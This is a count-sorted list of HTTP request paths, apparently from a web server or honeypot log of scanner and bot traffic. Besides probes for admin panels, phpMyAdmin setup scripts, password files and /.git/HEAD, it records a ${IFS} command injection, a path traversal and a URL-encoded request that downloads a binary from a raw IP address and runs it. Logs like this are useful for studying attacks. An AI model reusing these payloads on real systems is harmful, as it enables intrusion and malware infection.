  61 Request path: /
  14 Request path: /favicon.ico
   6 Request path: /webdav/
   5 Request path: /robots.txt
   5 Request path: /login
   4 Request path: /phpmyadmin
   4 Request path: /index.html
   4 Request path: /auth/login
   3 Request path: /index.php
   3 Request path: /auth
   3 Request path: /administrator
   3 Request path: /admin
   2 Request path: /password.txt
   2 Request path: /password
   2 Request path: /pass
   2 Request path: /login.php
   2 Request path: /language/Swedish${IFS}&&echo${IFS}610cker
>qt&&tar${IFS}/string.js
   2 Request path: /command.php
   2 Request path: /cgi/common.cgi
   2 Request path: /../../../../../../../mnt/mtd/qt
   1 Request path: /x
   1 Request path: /w00tw00t.at.blackhats.romanian.anti-sec:)
   1 Request path: /stssys.htm
   1 Request path: /shell?%63%64%20%2F%74%6D%70%3B%77%67%65%74
%20%2D%63%20%68%74%74%70%3A%2F%2F%31%32%32%2E%31%31%34%2E%32
%35%33%2E%39%34%3A%31%35%35%32%31%2F%61%72%6D%67%67%3B%63%68
%6D%6F%64%20%37%37%37%20%61%72%6D%67%67%3B%2E%2F%61%72%6D%67
%67%20%26
   1 Request path: /pma/scripts/setup.php
   1 Request path: /phpmyadmin/scripts/setup.php
   1 Request path: /phpmyadmin/index.php
   1 Request path: /nmaplowercheck1480791133
   1 Request path: /nice%20ports%2C/Tri%6Eity.txt%2ebak
   1 Request path: /myadmin/scripts/setup.php
   1 Request path: /log
   1 Request path: /hidden
   1 Request path: /form
   1 Request path: /forgotpass
   1 Request path: /contact
   1 Request path: /MyAdmin/scripts/setup.php
   1 Request path: /HNAP1
   1 Request path: /.git/HEAD
